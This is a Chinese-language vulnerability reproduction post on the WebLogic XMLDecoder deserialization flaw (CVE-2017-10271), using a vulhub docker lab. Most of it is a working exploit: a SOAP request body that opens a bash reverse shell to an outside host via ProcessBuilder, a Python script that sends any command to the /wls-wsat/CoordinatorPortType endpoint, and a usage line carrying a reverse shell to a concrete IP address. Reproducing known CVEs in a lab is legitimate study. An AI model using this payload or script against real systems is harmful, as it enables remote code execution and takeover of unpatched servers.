【漏洞复现系列】WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271）

使用vulhub环境：

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271

启动测试环境：

docker-compose up -d

访问7001端口：

http://your-ip:7001/

出现404即可

接下来使用Postman进行发包

url为：

http://your-ip:7001/wls-wsat/CoordinatorPortType

requestBody为：

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>bash -i &gt;&amp; /dev/tcp/xx.xx.xx.xx/4455 0&gt;&amp;1</string>
                        </void>
                    </array>
                    <void method="start"/></void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

需要注意的是：请求头里面的Content-type字段的值必须为text/xml，否则会报415错误

 出现如下即可反弹shell成功：

 

python攻击脚本如下：

import requests
import random
import html
from sys import argv

def weblogic_poc(weblogic_ip, weblogic_port, command):
    url = "http://" + weblogic_ip + ":" + weblogic_port + "/wls-wsat/CoordinatorPortType" + random.choice(['', '11'])
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
        "Content-type": "text/xml"
    }
    data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java version="1.4.0" class="java.beans.XMLDecoder">
                    <void class="java.lang.ProcessBuilder">
                        <array class="java.lang.String" length="3">
                            <void index="0">
                                <string>/bin/bash</string>
                            </void>
                            <void index="1">
                                <string>-c</string>
                            </void>
                            <void index="2">
                                <string>''' + html.escape(command) + '''</string>
                            </void>
                        </array>
                        <void method="start"/></void>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
    </soapenv:Envelope>'''
    requests.post(url=url, data=data, headers=headers)

if __name__ == "__main__":
    if len(argv) < 4:
        print("please input weblogic_ip weblogic_port command")
        print(len(argv))
    else:
        weblogic_ip = argv[1]
        weblogic_port = argv[2]
        command = argv[3]
        print(command)
        weblogic_poc(weblogic_ip, weblogic_port, command)

使用方法：

python CVE_2017_10271.py xx.xx.xx.xx 7001 "bash -i >& /dev/tcp/47.102.212.2/4455 0>&1"

python3运行此脚本，参数1是weblogic的ip，参数2是weblogic的端口，参数3是系统命令（由于命令中一般含有空格，所以需要用引号引起来）